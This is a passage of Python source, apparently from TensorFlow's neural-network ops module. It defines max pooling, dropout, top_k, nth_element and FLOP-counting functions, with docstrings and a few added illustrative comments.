@dispatch.add_dispatch_support
def max_pool_v2(input, ksize, strides, padding, data_format=None, name=None):
"""Performs max pooling on the input.
For a given window of `ksize`, takes the maximum value within that window.
Used for reducing computation and preventing overfitting.
Consider an example of pooling with 2x2, non-overlapping windows:
>>> matrix = tf.constant([
... [0, 0, 1, 7],
... [0, 2, 0, 0],
... [5, 2, 0, 0],
... [0, 0, 9, 8],
... ])
>>> reshaped = tf.reshape(matrix, (1, 4, 4, 1))
>>> tf.nn.max_pool(reshaped, ksize=2, strides=2, padding="SAME")
<tf.Tensor: shape=(1, 2, 2, 1), dtype=int32, numpy=
array([[[[2],
[7]],
[[5],
[9]]]], dtype=int32)>
We can adjust the window size using the `ksize` parameter. For example, if we
were to expand the window to 3:
>>> tf.nn.max_pool(reshaped, ksize=3, strides=2, padding="SAME")
<tf.Tensor: shape=(1, 2, 2, 1), dtype=int32, numpy=
array([[[[5],
[7]],
[[9],
[9]]]], dtype=int32)>
We've now picked up two additional large numbers (5 and 9) in two of the
pooled spots.
Note that our windows are now overlapping, since we're still moving by 2 units
on each iteration. This is causing us to see the same 9 repeated twice, since
it is part of two overlapping windows.
We can adjust how far we move our window with each iteration using the
`strides` parameter. Updating this to the same value as our window size
eliminates the overlap:
>>> tf.nn.max_pool(reshaped, ksize=3, strides=3, padding="SAME")
<tf.Tensor: shape=(1, 2, 2, 1), dtype=int32, numpy=
array([[[[2],
[7]],
[[5],
[9]]]], dtype=int32)>
Because the window does not neatly fit into our input, padding is added around
the edges, giving us the same result as when we used a 2x2 window. We can skip
padding altogether and simply drop the windows that do not fully fit into our
input by instead passing `"VALID"` to the `padding` argument:
>>> tf.nn.max_pool(reshaped, ksize=3, strides=3, padding="VALID")
<tf.Tensor: shape=(1, 1, 1, 1), dtype=int32, numpy=array([[[[5]]]],
dtype=int32)>
Now we've grabbed the largest value in the 3x3 window starting from the upper-
left corner. Since no other windows fit in our input, they are dropped.
Args:
input: Tensor of rank N+2, of shape `[batch_size] + input_spatial_shape +
[num_channels]` if `data_format` does not start with "NC" (default), or
`[batch_size, num_channels] + input_spatial_shape` if data_format starts
with "NC". Pooling happens over the spatial dimensions only.
ksize: An int or list of `ints` that has length `1`, `N` or `N+2`. The size
of the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `N` or `N+2`. The
stride of the sliding window for each dimension of the input tensor.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`. When using explicit
padding, the size of the paddings cannot be greater than the sliding
window size.
data_format: A string. Specifies the channel dimension. For N=1 it can be
either "NWC" (default) or "NCW", for N=2 it can be either "NHWC" (default)
or "NCHW" and for N=3 either "NDHWC" (default) or "NCDHW".
name: Optional name for the operation.
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
if input.shape is not None:
n = len(input.shape) - 2
elif data_format is not None:
n = len(data_format) - 2
else:
raise ValueError(
"The input must have a rank or a data format must be given.")
if not 1 <= n <= 3:
raise ValueError(
"Input tensor must be of rank 3, 4 or 5 but was {}.".format(n + 2))
if data_format is None:
channel_index = n + 1
else:
channel_index = 1 if data_format.startswith("NC") else n + 1
if isinstance(padding, (list, tuple)) and data_format == "NCHW_VECT_C":
raise ValueError("Data formats NCHW_VECT_C is not yet supported with "
"explicit padding")
ksize = _get_sequence(ksize, n, channel_index, "ksize")
strides = _get_sequence(strides, n, channel_index, "strides")
if (isinstance(padding, (list, tuple)) and n == 3):
raise ValueError("Explicit padding is not yet supported with an input "
"tensor of rank 5")
max_pooling_ops = {
1: max_pool1d,
2: max_pool2d,
3: gen_nn_ops.max_pool3d
}
op = max_pooling_ops[n]
return op(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
# pylint: enable=redefined-builtin
@tf_export(v1=["nn.max_pool"])
@dispatch.add_dispatch_support
def max_pool(value,
ksize,
strides,
padding,
data_format="NHWC",
name=None,
input=None): # pylint: disable=redefined-builtin
"""Performs the max pooling on the input.
Args:
value: A 4-D `Tensor` of the format specified by `data_format`.
ksize: An int or list of `ints` that has length `1`, `2` or `4`.
The size of the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `2` or `4`.
The stride of the sliding window for each dimension of the input tensor.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`. When using explicit
padding, the size of the paddings cannot be greater than the sliding
window size.
data_format: A string. 'NHWC', 'NCHW' and 'NCHW_VECT_C' are supported.
name: Optional name for the operation.
input: Alias for value.
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
value = deprecation.deprecated_argument_lookup("input", input, "value", value)
with ops.name_scope(name, "MaxPool", [value]) as name:
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
ksize = _get_sequence(ksize, 2, channel_index, "ksize")
strides = _get_sequence(strides, 2, channel_index, "strides")
if isinstance(padding, (list, tuple)) and data_format == "NCHW_VECT_C":
raise ValueError("Data formats NCHW_VECT_C is not yet supported with "
"explicit padding")
padding, explicit_paddings = convert_padding(padding)
if ((np.isscalar(ksize) and ksize == 0) or
(isinstance(ksize,
(list, tuple, np.ndarray)) and any(v == 0 for v in ksize))):
raise ValueError("ksize cannot be zero.")
return gen_nn_ops.max_pool(
value,
ksize=ksize,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
name=name)
# pylint: disable=redefined-builtin
@tf_export("nn.max_pool1d")
@dispatch.add_dispatch_support
def max_pool1d(input, ksize, strides, padding, data_format="NWC", name=None):
"""Performs the max pooling on the input.
Note that internally this op reshapes the input and uses the underlying 2-D
operation.
Args:
input: A 3-D `Tensor` of the format specified by `data_format`.
ksize: An int or list of `ints` that has length `1` or `3`. The size of the
window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1` or `3`. The stride of
the sliding window for each dimension of the input tensor.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NWC"`, this should be in the form `[[0, 0], [pad_left,
pad_right], [0, 0]]`. When explicit padding used and data_format is
`"NCW"`, this should be in the form `[[0, 0], [0, 0], [pad_left,
pad_right]]`. When using explicit padding, the size of the paddings cannot
be greater than the sliding window size.
data_format: An optional string from: "NWC", "NCW". Defaults to "NWC".
name: A name for the operation (optional).
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
with ops.name_scope(name, "MaxPool1d", [input]) as name:
if isinstance(padding, (list, tuple)) and data_format == "NCHW_VECT_C":
raise ValueError("Data formats NCHW_VECT_C is not yet supported with "
"explicit padding")
if data_format is None:
data_format = "NWC"
channel_index = 1 if data_format.startswith("NC") else 2
ksize = [1] + _get_sequence(ksize, 1, channel_index, "ksize")
strides = [1] + _get_sequence(strides, 1, channel_index, "strides")
padding, explicit_paddings = convert_padding(padding, 3)
if padding == "EXPLICIT":
explicit_paddings = [0, 0] + explicit_paddings
expanding_dim = 1 if data_format == "NWC" else 2
data_format = "NHWC" if data_format == "NWC" else "NCHW"
input = array_ops.expand_dims_v2(input, expanding_dim)
result = gen_nn_ops.max_pool(
input,
ksize=ksize,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
name=name)
return array_ops.squeeze(result, expanding_dim)
# pylint: enable=redefined-builtin
# pylint: disable=redefined-builtin
@tf_export("nn.max_pool2d")
@dispatch.add_dispatch_support
def max_pool2d(input, ksize, strides, padding, data_format="NHWC", name=None):
"""Performs the max pooling on the input.
Args:
input: A 4-D `Tensor` of the format specified by `data_format`.
ksize: An int or list of `ints` that has length `1`, `2` or `4`. The size of
the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of the input tensor.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`. When using explicit
padding, the size of the paddings cannot be greater than the sliding
window size.
data_format: A string. 'NHWC', 'NCHW' and 'NCHW_VECT_C' are supported.
name: Optional name for the operation.
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
with ops.name_scope(name, "MaxPool2d", [input]) as name:
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
ksize = _get_sequence(ksize, 2, channel_index, "ksize")
strides = _get_sequence(strides, 2, channel_index, "strides")
if isinstance(padding, (list, tuple)) and data_format == "NCHW_VECT_C":
raise ValueError("Data formats NCHW_VECT_C is not yet supported with "
"explicit padding")
padding, explicit_paddings = convert_padding(padding)
return gen_nn_ops.max_pool(
input,
ksize=ksize,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
name=name)
# pylint: enable=redefined-builtin
# pylint: disable=redefined-builtin
@tf_export("nn.max_pool3d")
@dispatch.add_dispatch_support
def max_pool3d(input, ksize, strides, padding, data_format="NDHWC", name=None):
"""Performs the max pooling on the input.
Args:
input: A 5-D `Tensor` of the format specified by `data_format`.
ksize: An int or list of `ints` that has length `1`, `3` or `5`. The size of
the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `3` or `5`. The
stride of the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm. See
the "returns" section of `tf.nn.convolution` for details.
data_format: An optional string from: "NDHWC", "NCDHW". Defaults to "NDHWC".
The data format of the input and output data. With the default format
"NDHWC", the data is stored in the order of: [batch, in_depth, in_height,
in_width, in_channels]. Alternatively, the format could be "NCDHW", the
data storage order is: [batch, in_channels, in_depth, in_height,
in_width].
name: A name for the operation (optional).
Returns:
A `Tensor` of format specified by `data_format`.
The max pooled output tensor.
"""
with ops.name_scope(name, "MaxPool3D", [input]) as name:
if data_format is None:
data_format = "NDHWC"
channel_index = 1 if data_format.startswith("NC") else 4
ksize = _get_sequence(ksize, 3, channel_index, "ksize")
strides = _get_sequence(strides, 3, channel_index, "strides")
return gen_nn_ops.max_pool3d(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
# pylint: enable=redefined-builtin
@tf_export("nn.max_pool_with_argmax", v1=[])
@dispatch.add_dispatch_support
def max_pool_with_argmax_v2(
input, # pylint: disable=redefined-builtin
ksize,
strides,
padding,
data_format="NHWC",
output_dtype=dtypes.int64,
include_batch_in_index=False,
name=None):
"""Performs max pooling on the input and outputs both max values and indices.
The indices in `argmax` are flattened, so that a maximum value at position
`[b, y, x, c]` becomes flattened index: `(y * width + x) * channels + c` if
`include_batch_in_index` is False;
`((b * height + y) * width + x) * channels + c`
if `include_batch_in_index` is True.
The indices returned are always in `[0, height) x [0, width)` before
flattening, even if padding is involved and the mathematically correct answer
is outside (either negative or too large). This is a bug, but fixing it is
difficult to do in a safe backwards compatible way, especially due to
flattening.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`,
`int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`,
`uint32`, `uint64`.
4-D with shape `[batch, height, width, channels]`. Input to pool over.
ksize: An int or list of `ints` that has length `1`, `2` or `4`.
The size of the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `2` or `4`.
The stride of the sliding window for each dimension of the
input tensor.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string`, must be set to `"NHWC"`. Defaults to
`"NHWC"`.
Specify the data format of the input and output data.
output_dtype: An optional `tf.DType` from: `tf.int32, tf.int64`.
Defaults to `tf.int64`.
The dtype of the returned argmax tensor.
include_batch_in_index: An optional `boolean`. Defaults to `False`.
Whether to include batch dimension in flattened index of `argmax`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, argmax).
output: A `Tensor`. Has the same type as `input`.
argmax: A `Tensor` of type `output_dtype`.
"""
if data_format != "NHWC":
raise ValueError("Data formats other than 'NHWC' are not yet supported")
ksize = _get_sequence(ksize, 2, 3, "ksize")
strides = _get_sequence(strides, 2, 3, "strides")
return gen_nn_ops.max_pool_with_argmax(
input=input,
ksize=ksize,
strides=strides,
padding=padding,
Targmax=output_dtype,
include_batch_in_index=include_batch_in_index,
name=name)
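# Illustrative worked example (not part of the original module): with
# `include_batch_in_index=False` the argmax indices are flattened per batch
# element as `(y * width + x) * channels + c`. For a 4x4 single-channel input,
# a maximum found at row y=3, column x=2 is therefore reported as index
# (3 * 4 + 2) * 1 + 0 = 14.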
@tf_export(v1=["nn.max_pool_with_argmax"])
@dispatch.add_dispatch_support
def max_pool_with_argmax_v1( # pylint: disable=missing-docstring,invalid-name
input, # pylint: disable=redefined-builtin
ksize,
strides,
padding,
data_format="NHWC",
Targmax=None,
name=None,
output_dtype=None,
include_batch_in_index=False):
if data_format != "NHWC":
raise ValueError("Data formats other than 'NHWC' are not yet supported")
Targmax = deprecated_argument_lookup(
"output_dtype", output_dtype, "Targmax", Targmax)
if Targmax is None:
Targmax = dtypes.int64
return gen_nn_ops.max_pool_with_argmax(
input=input,
ksize=ksize,
strides=strides,
padding=padding,
Targmax=Targmax,
include_batch_in_index=include_batch_in_index,
name=name)
max_pool_with_argmax_v1.__doc__ = gen_nn_ops.max_pool_with_argmax.__doc__
@ops.RegisterStatistics("Conv3D", "flops")
def _calc_conv3d_flops(graph, node):
"""Calculates the compute resources needed for Conv3D."""
input_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
input_shape.assert_is_fully_defined()
filter_shape = graph_util.tensor_shape_from_node_def_name(
graph, node.input[1])
filter_shape.assert_is_fully_defined()
output_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
output_shape.assert_is_fully_defined()
filter_time = int(filter_shape[0])
filter_height = int(filter_shape[1])
filter_width = int(filter_shape[2])
filter_in_depth = int(filter_shape[3])
output_count = np.prod(output_shape.as_list(), dtype=np.int64)
return ops.OpStats("flops", (output_count * filter_in_depth * filter_time *
filter_height * filter_width * 2))
@ops.RegisterStatistics("Conv2D", "flops")
def _calc_conv_flops(graph, node):
"""Calculates the compute resources needed for Conv2D."""
input_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
input_shape.assert_is_fully_defined()
filter_shape = graph_util.tensor_shape_from_node_def_name(
graph, node.input[1])
filter_shape.assert_is_fully_defined()
output_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
output_shape.assert_is_fully_defined()
filter_height = int(filter_shape[0])
filter_width = int(filter_shape[1])
filter_in_depth = int(filter_shape[2])
output_count = np.prod(output_shape.as_list(), dtype=np.int64)
return ops.OpStats(
"flops",
(output_count * filter_in_depth * filter_height * filter_width * 2))
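# Illustrative worked example (not part of the original module): for a Conv2D
# with a 3x3 kernel over 64 input channels and a [1, 32, 32, 128] output, the
# statistic above is
#   output_count * filter_in_depth * filter_height * filter_width * 2
#   = (1 * 32 * 32 * 128) * 64 * 3 * 3 * 2 = 150,994,944 flops,
# i.e. one multiply and one add per filter tap and output element.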
@ops.RegisterStatistics("DepthwiseConv2dNative", "flops")
def _calc_depthwise_conv_flops(graph, node):
"""Calculates the compute resources needed for DepthwiseConv2dNative."""
input_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
input_shape.assert_is_fully_defined()
filter_shape = graph_util.tensor_shape_from_node_def_name(
graph, node.input[1])
filter_shape.assert_is_fully_defined()
output_shape = graph_util.tensor_shape_from_node_def_name(graph, node.name)
output_shape.assert_is_fully_defined()
filter_height = int(filter_shape[0])
filter_width = int(filter_shape[1])
output_count = np.prod(output_shape.as_list(), dtype=np.int64)
return ops.OpStats("flops", (output_count * filter_height * filter_width * 2))
@ops.RegisterStatistics("BiasAdd", "flops")
def _calc_bias_add_flops(graph, node):
"""Calculates the computing needed for BiasAdd."""
input_shape = graph_util.tensor_shape_from_node_def_name(graph, node.input[0])
input_shape.assert_is_fully_defined()
input_count = np.prod(input_shape.as_list())
return ops.OpStats("flops", input_count)
@tf_export(v1=["nn.xw_plus_b"])
@dispatch.add_dispatch_support
def xw_plus_b(x, weights, biases, name=None): # pylint: disable=invalid-name
"""Computes matmul(x, weights) + biases.
Args:
x: a 2D tensor. Dimensions typically: batch, in_units
weights: a 2D tensor. Dimensions typically: in_units, out_units
biases: a 1D tensor. Dimensions: out_units
name: A name for the operation (optional). If not specified
"xw_plus_b" is used.
Returns:
A 2-D Tensor computing matmul(x, weights) + biases.
Dimensions typically: batch, out_units.
"""
with ops.name_scope(name, "xw_plus_b", [x, weights, biases]) as name:
x = ops.convert_to_tensor(x, name="x")
weights = ops.convert_to_tensor(weights, name="weights")
biases = ops.convert_to_tensor(biases, name="biases")
mm = math_ops.matmul(x, weights)
return bias_add(mm, biases, name=name)
def xw_plus_b_v1(x, weights, biases, name=None):
"""Computes matmul(x, weights) + biases.
This is a deprecated version that will soon be removed.
Args:
x: a 2D tensor. Dimensions typically: batch, in_units
weights: a 2D tensor. Dimensions typically: in_units, out_units
biases: a 1D tensor. Dimensions: out_units
name: A name for the operation (optional). If not specified
"xw_plus_b_v1" is used.
Returns:
A 2-D Tensor computing matmul(x, weights) + biases.
Dimensions typically: batch, out_units.
"""
with ops.name_scope(name, "xw_plus_b_v1", [x, weights, biases]) as name:
x = ops.convert_to_tensor(x, name="x")
weights = ops.convert_to_tensor(weights, name="weights")
biases = ops.convert_to_tensor(biases, name="biases")
mm = math_ops.matmul(x, weights)
return bias_add_v1(mm, biases, name=name)
def _get_noise_shape(x, noise_shape):
# If noise_shape is none return immediately.
if noise_shape is None:
return array_ops.shape(x)
try:
# Best effort to figure out the intended shape.
# If not possible, let the op handle it.
# In eager mode an exception will be raised.
noise_shape_ = tensor_shape.as_shape(noise_shape)
except (TypeError, ValueError):
return noise_shape
if x.shape.dims is not None and len(x.shape.dims) == len(noise_shape_.dims):
new_dims = []
for i, dim in enumerate(x.shape.dims):
if noise_shape_.dims[i].value is None and dim.value is not None:
new_dims.append(dim.value)
else:
new_dims.append(noise_shape_.dims[i].value)
return tensor_shape.TensorShape(new_dims)
return noise_shape
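# Illustrative sketch (not part of the original module): dimensions left as
# `None` in `noise_shape` are filled in from `x` when the ranks match, so the
# dropout mask can broadcast over the remaining axes. Assuming the public `tf`
# API:
#
#   x = tf.ones([8, 10, 16])
#   _get_noise_shape(x, [None, 1, None])  # -> TensorShape([8, 1, 16])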
@tf_export(v1=["nn.dropout"])
@dispatch.add_dispatch_support
@deprecation.deprecated_args(None, "Please use `rate` instead of `keep_prob`. "
"Rate should be set to `rate = 1 - keep_prob`.",
"keep_prob")
def dropout(x, keep_prob=None, noise_shape=None, seed=None, name=None,
rate=None):
"""Computes dropout.
For each element of `x`, with probability `rate`, outputs `0`, and otherwise
scales up the input by `1 / (1-rate)`. The scaling is such that the expected
sum is unchanged.
By default, each element is kept or dropped independently. If `noise_shape`
is specified, it must be
[broadcastable](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html)
to the shape of `x`, and only dimensions with `noise_shape[i] == shape(x)[i]`
will make independent decisions. For example, if `shape(x) = [k, l, m, n]`
and `noise_shape = [k, 1, 1, n]`, each batch and channel component will be
kept independently and each row and column will be kept or not kept together.
Args:
x: A floating point tensor.
keep_prob: (deprecated) Alias for `(1 - rate)`.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
seed: A Python integer. Used to create random seeds. See
`tf.random.set_seed` for behavior.
name: A name for this operation (optional).
rate: A scalar `Tensor` with the same type as `x`. The probability that each
element of `x` is discarded.
Returns:
A Tensor of the same shape of `x`.
Raises:
ValueError: If `rate` is not in `[0, 1)` or if `x` is not a floating
point tensor.
"""
try:
keep = 1. - keep_prob if keep_prob is not None else None
except TypeError:
raise ValueError("keep_prob must be a floating point number or Tensor "
"(got %r)" % keep_prob)
rate = deprecation.deprecated_argument_lookup(
"rate", rate,
"keep_prob", keep)
if rate is None:
raise ValueError("You must provide a rate to dropout.")
return dropout_v2(x, rate, noise_shape=noise_shape, seed=seed, name=name)
@tf_export("nn.dropout", v1=[])
@dispatch.add_dispatch_support
def dropout_v2(x, rate, noise_shape=None, seed=None, name=None):
"""Computes dropout: randomly sets elements to zero to prevent overfitting.
Note: The behavior of dropout has changed between TensorFlow 1.x and 2.x.
When converting 1.x code, please use named arguments to ensure behavior stays
consistent.
See also: `tf.keras.layers.Dropout` for a dropout layer.
[Dropout](https://arxiv.org/abs/1207.0580) is useful for regularizing DNN
models. Input elements are randomly set to zero (and the other elements are
rescaled). This encourages each node to be independently useful, as it cannot
rely on the output of other nodes.
More precisely: With probability `rate` elements of `x` are set to `0`.
The remaining elements are scaled up by `1.0 / (1 - rate)`, so that the
expected value is preserved.
>>> tf.random.set_seed(0)
>>> x = tf.ones([3,5])
>>> tf.nn.dropout(x, rate = 0.5, seed = 1).numpy()
array([[2., 0., 0., 2., 2.],
[2., 2., 2., 2., 2.],
[2., 0., 2., 0., 2.]], dtype=float32)
>>> tf.random.set_seed(0)
>>> x = tf.ones([3,5])
>>> tf.nn.dropout(x, rate = 0.8, seed = 1).numpy()
array([[0., 0., 0., 5., 5.],
[0., 5., 0., 5., 0.],
[5., 0., 5., 0., 5.]], dtype=float32)
>>> tf.nn.dropout(x, rate = 0.0) == x
<tf.Tensor: shape=(3, 5), dtype=bool, numpy=
array([[ True, True, True, True, True],
[ True, True, True, True, True],
[ True, True, True, True, True]])>
By default, each element is kept or dropped independently. If `noise_shape`
is specified, it must be
[broadcastable](http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html)
to the shape of `x`, and only dimensions with `noise_shape[i] == shape(x)[i]`
will make independent decisions. This is useful for dropping whole
channels from an image or sequence. For example:
>>> tf.random.set_seed(0)
>>> x = tf.ones([3,10])
>>> tf.nn.dropout(x, rate = 2/3, noise_shape=[1,10], seed=1).numpy()
array([[0., 0., 0., 3., 3., 0., 3., 3., 3., 0.],
[0., 0., 0., 3., 3., 0., 3., 3., 3., 0.],
[0., 0., 0., 3., 3., 0., 3., 3., 3., 0.]], dtype=float32)
Args:
x: A floating point tensor.
rate: A scalar `Tensor` with the same type as x. The probability
that each element is dropped. For example, setting rate=0.1 would drop
10% of input elements.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
seed: A Python integer. Used to create random seeds. See
`tf.random.set_seed` for behavior.
name: A name for this operation (optional).
Returns:
A Tensor of the same shape of `x`.
Raises:
ValueError: If `rate` is not in `[0, 1)` or if `x` is not a floating point
tensor. `rate=1` is disallowed, because the output would be all zeros,
which is likely not what was intended.
"""
with ops.name_scope(name, "dropout", [x]) as name:
is_rate_number = isinstance(rate, numbers.Real)
if is_rate_number and (rate < 0 or rate >= 1):
raise ValueError("rate must be a scalar tensor or a float in the "
"range [0, 1), got %g" % rate)
x = ops.convert_to_tensor(x, name="x")
x_dtype = x.dtype
if not x_dtype.is_floating:
raise ValueError("x has to be a floating point tensor since it's going "
"to be scaled. Got a %s tensor instead." % x_dtype)
if is_rate_number and rate == 0:
# Fast-path: Return the input immediately if rate is non-tensor & is `0`.
# We trigger this after all error checking
# and after `x` has been converted to a tensor, to prevent inconsistent
# tensor conversions/error raising if rate is changed to/from 0.
#
# We also explicitly call `random_seed.get_seed` to make sure
# we don't change the random number generation behavior of
# stateful random ops by entering a fastpath,
# despite not generating a random tensor in the fastpath
random_seed.get_seed(seed)
return x
is_executing_eagerly = context.executing_eagerly()
if not tensor_util.is_tf_type(rate):
if is_rate_number:
keep_prob = 1 - rate
scale = 1 / keep_prob
scale = ops.convert_to_tensor(scale, dtype=x_dtype)
ret = gen_math_ops.mul(x, scale)
else:
raise ValueError("rate is neither scalar nor scalar tensor %r" % rate)
else:
rate.get_shape().assert_has_rank(0)
rate_dtype = rate.dtype
if rate_dtype != x_dtype:
if not rate_dtype.is_compatible_with(x_dtype):
raise ValueError(
"Tensor dtype %s is incomptaible with Tensor dtype %s: %r" %
(x_dtype.name, rate_dtype.name, rate))
rate = gen_math_ops.cast(rate, x_dtype, name="rate")
one_tensor = constant_op.constant(1, dtype=x_dtype)
ret = gen_math_ops.real_div(x, gen_math_ops.sub(one_tensor, rate))
noise_shape = _get_noise_shape(x, noise_shape)
# Sample a uniform distribution on [0.0, 1.0) and select values larger
# than rate.
#
# NOTE: Random uniform can only generate 2^23 floats on [1.0, 2.0)
# and subtract 1.0.
random_tensor = random_ops.random_uniform(
noise_shape, seed=seed, dtype=x_dtype)
# NOTE: if (1.0 + rate) - 1 is equal to rate, then that float is selected,
# hence a >= comparison is used.
keep_mask = random_tensor >= rate
ret = gen_math_ops.mul(ret, gen_math_ops.cast(keep_mask, x_dtype))
if not is_executing_eagerly:
ret.set_shape(x.get_shape())
return ret
@tf_export("math.top_k", "nn.top_k")
@dispatch.add_dispatch_support
def top_k(input, k=1, sorted=True, name=None): # pylint: disable=redefined-builtin
"""Finds values and indices of the `k` largest entries for the last dimension.
If the input is a vector (rank=1), finds the `k` largest entries in the vector
and outputs their values and indices as vectors. Thus `values[j]` is the
`j`-th largest entry in `input`, and its index is `indices[j]`.
>>> result = tf.math.top_k([1, 2, 98, 1, 1, 99, 3, 1, 3, 96, 4, 1],
... k=3)
>>> result.values.numpy()
array([99, 98, 96], dtype=int32)
>>> result.indices.numpy()
array([5, 2, 9], dtype=int32)
For matrices (resp. higher rank input), computes the top `k` entries in each
row (resp. vector along the last dimension). Thus,
>>> input = tf.random.normal(shape=(3,4,5,6))
>>> k = 2
>>> values, indices = tf.math.top_k(input, k=k)
>>> values.shape.as_list()
[3, 4, 5, 2]
>>>
>>> values.shape == indices.shape == input.shape[:-1] + [k]
True
The indices can be used to `gather` from a tensor whose shape matches `input`.
>>> gathered_values = tf.gather(input, indices, batch_dims=-1)
>>> assert tf.reduce_all(gathered_values == values)
If two elements are equal, the lower-index element appears first.
>>> result = tf.math.top_k([1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0],
... k=3)
>>> result.indices.numpy()
array([0, 1, 3], dtype=int32)
Args:
input: 1-D or higher `Tensor` with last dimension at least `k`.
k: 0-D `int32` `Tensor`. Number of top elements to look for along the last
dimension (along each row for matrices).
sorted: If true the resulting `k` elements will be sorted by the values in
descending order.
name: Optional name for the operation.
Returns:
A tuple with two named fields:
values: The `k` largest elements along each last dimensional slice.
indices: The indices of `values` within the last dimension of `input`.
"""
return gen_nn_ops.top_kv2(input, k=k, sorted=sorted, name=name)
def nth_element(input, n, reverse=False, name=None): # pylint: disable=redefined-builtin
r"""Finds values of the `n`-th smallest value for the last dimension.
Note that n is zero-indexed.
If the input is a vector (rank-1), finds the entry which is the n-th smallest
value in the vector and outputs its value as a scalar tensor.
For matrices (resp. higher rank input), computes the entry which is the
n-th smallest value in each row (resp. vector along the last dimension). Thus,
values.shape = input.shape[:-1]
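For example (an illustrative sketch; note that in this file the helper is not
exported under a public `tf.*` name): with `input = [[3, 1, 2], [1, 3, 4]]`
and `n = 1`, the result is `[2, 3]`, i.e. the second-smallest value of each row.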
Args:
input: 1-D or higher `Tensor` with last dimension at least `n+1`.
n: A `Tensor` of type `int32`.
0-D. Position of sorted vector to select along the last dimension (along
      each row for matrices). Valid range of n is `[0, input.shape[-1])`
reverse: An optional `bool`. Defaults to `False`.
      When set to True, finds the n-th largest value in the vector instead of
      the n-th smallest.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
The `n`-th order statistic along each last dimensional slice.
"""
return gen_nn_ops.nth_element(input, n, reverse=reverse, name=name)
@tf_export(v1=["nn.fractional_max_pool"])
@dispatch.add_dispatch_support
@deprecation.deprecated(date=None, instructions="`seed2` and `deterministic` "
"args are deprecated. Use fractional_max_pool_v2.")
def fractional_max_pool(value,
pooling_ratio,
pseudo_random=False,
overlapping=False,
deterministic=False,
seed=0,
seed2=0,
name=None): # pylint: disable=redefined-builtin
r"""Performs fractional max pooling on the input.
This is a deprecated version of `fractional_max_pool`.
Fractional max pooling is slightly different than regular max pooling. In
regular max pooling, you downsize an input set by taking the maximum value of
smaller N x N subsections of the set (often 2x2), and try to reduce the set by
a factor of N, where N is an integer. Fractional max pooling, as you might
expect from the word "fractional", means that the overall reduction ratio N
does not have to be an integer.
The sizes of the pooling regions are generated randomly but are fairly
uniform. For example, let's look at the height dimension, and the constraints
on the list of rows that will be pool boundaries.
First we define the following:
1. input_row_length : the number of rows from the input set
2. output_row_length : which will be smaller than the input
3. alpha = input_row_length / output_row_length : our reduction ratio
4. K = floor(alpha)
5. row_pooling_sequence : this is the result list of pool boundary rows
Then, row_pooling_sequence should satisfy:
1. a[0] = 0 : the first value of the sequence is 0
2. a[end] = input_row_length : the last value of the sequence is the size
3. K <= (a[i+1] - a[i]) <= K+1 : all intervals are K or K+1 size
4. length(row_pooling_sequence) = output_row_length+1
Args:
value: A `Tensor`. 4-D with shape `[batch, height, width, channels]`.
pooling_ratio: A list of `floats` that has length >= 4. Pooling ratio for
